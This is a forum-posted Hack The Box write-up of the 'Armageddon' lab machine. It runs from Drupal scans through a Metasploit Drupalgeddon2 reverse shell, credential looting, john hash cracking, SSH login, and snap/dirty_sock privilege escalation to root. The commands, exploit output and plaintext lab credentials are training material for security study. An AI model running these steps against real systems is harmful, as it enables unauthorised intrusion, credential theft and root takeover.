Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps


h3xu

188 views

image_2023-04-20_003453153.thumb.png.b695fc17f6ead93051b384b84ceadd27.png

Enumeration
Service Scan
The service scan reveals two open ports. A web application is running and has interesting directories to check. Additionally, we see Drupal 7 running, which gives us somewhat of a direction. `

# nmap -sC -sV -p-65535 armageddon                                                                           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 04:58 EDT
Nmap scan report for armageddon (10.10.10.233)
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.82 seconds

Droopescan
Thought to google dropal scanners and got a tool from github called droopescan.
 

# ./droopescan scan drupal -u http://armageddon
[+] Plugins found:                                                              
    profile http://armageddon/modules/profile/
    php http://armageddon/modules/php/
    image http://armageddon/modules/image/

[+] Themes found:
    seven http://armageddon/themes/seven/
    garland http://armageddon/themes/garland/

[+] Possible version(s):
    7.56

[+] Possible interesting urls found:
    Default changelog file - http://armageddon/CHANGELOG.txt

[+] Scan finished (0:01:07.454052 elapsed)

Searchsploit
Further internet searches on the applicable exploits led me to Drupalgeddon and will try it out in the next stage.

 

$ searchsploit drupal                    
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection                                                                            | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                                                                               | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                                       | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                         | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                       | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                                             | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                                                                                | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                              | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                   | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                    | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                         | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                         | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                            | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                              | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                  | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                             | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                               | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                       | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                   | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                            | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                         | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                 | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                             | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                    | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)               | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                      | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                  | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                   | php/webapps/44501.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections                                                      | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                                                                             | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting                                   | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                              | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                                     | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                       | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                             | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                      | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities        | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                   | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting                                                                       | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection                                                             | php/webapps/33410.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit
## metasploit drupalgeddon2
 

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.233:41324) at 2021-06-08 06:09:47 -0400
meterpreter > sysinfo                                                                                                                                 
Computer    : armageddon.htb                                                                                                                          
OS          : Linux armageddon.htb 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64                                              
Meterpreter : php/linux

 

We have a couple of directories in /var/www/html directory. After traversing the files, I have discovered a config file which contains a password and a username in settings.php within sites/default directory. I have also uploaded some privesc tools such as unix-privesc-check and linenum from meterpreter upload functionality.

 

ls
authorize.php  cron.php   INSTALL.mysql.txt  INSTALL.sqlite.txt  linenum.sh       modules   README.txt  sites               update.php     web.config
CHANGELOG.txt  includes   INSTALL.pgsql.txt  INSTALL.txt         MAINTAINERS.txt  out.txt   robots.txt  themes              UPGRADE.txt    xmlrpc.php
COPYRIGHT.txt  index.php  install.php        LICENSE.txt         misc             profiles  scripts     unix-privesc-check

 

cat usersdump.sql
<deleted>
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
<deleted>


Next, I'm using the credentials to login to drupal db and enumerate its tables. Following that, I'm dumping the users table from the database 'drupal'. Finally, I am analysing the dump file and discovered credentials for *brucetherealadmin*. 

mysql -u drupaluser -p -D drupal -e 'show tables;'

<deleted> 

users

<deleted>

mysqldump -u drupaluser -p drupal users > usersdump.sql

cat usersdump.sql

<deleted>
(1,'brucetherealadmin','$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt','[email protected]','','','filtered_html',1606998756,1607077194,1607076276,1,'Europe/London','',0,'[email protected]','a:1:{s:7:\"overlay\";i:1;}'),
<deleted>

Cracking the hash with john was easy and straightforward.

john forjohn -w /usr/share/wordlists/rockyou.txt

$ cat /home/kali/.john/john.pot
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo

 

Login to the web application with credentials.

Remembered there is an ssh service running so I tried logging into it.

# ssh [email protected]                             
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ 

 

I have discovered that the binary *snap* does not require password and is owned by root.

brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

 

A little research on snap gives us GTFO-bins solutions to the problem.
1. Tried https://gtfobins.github.io/gtfobins/snap/ but did not work.
2. A bit additional research reveals https://github.com/initstring/dirty_sock

I have followed the steps from '2' and it did not work. It seems the python version is incorrect. So I coppied the source code of the exploit and pasted it into a new file and ran it with the correct python version.

 

Finally, I was able to root the box by installing the snap exploit, which created a user called dirty_sock:dirty_sock which provides us with root access. The box is quite interesting and it's nice to learn something new such as the snap vulnerability and ways to exploit. All in all, pretty fun box.

 

0 Comments


Recommended Comments

Няма коментари

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy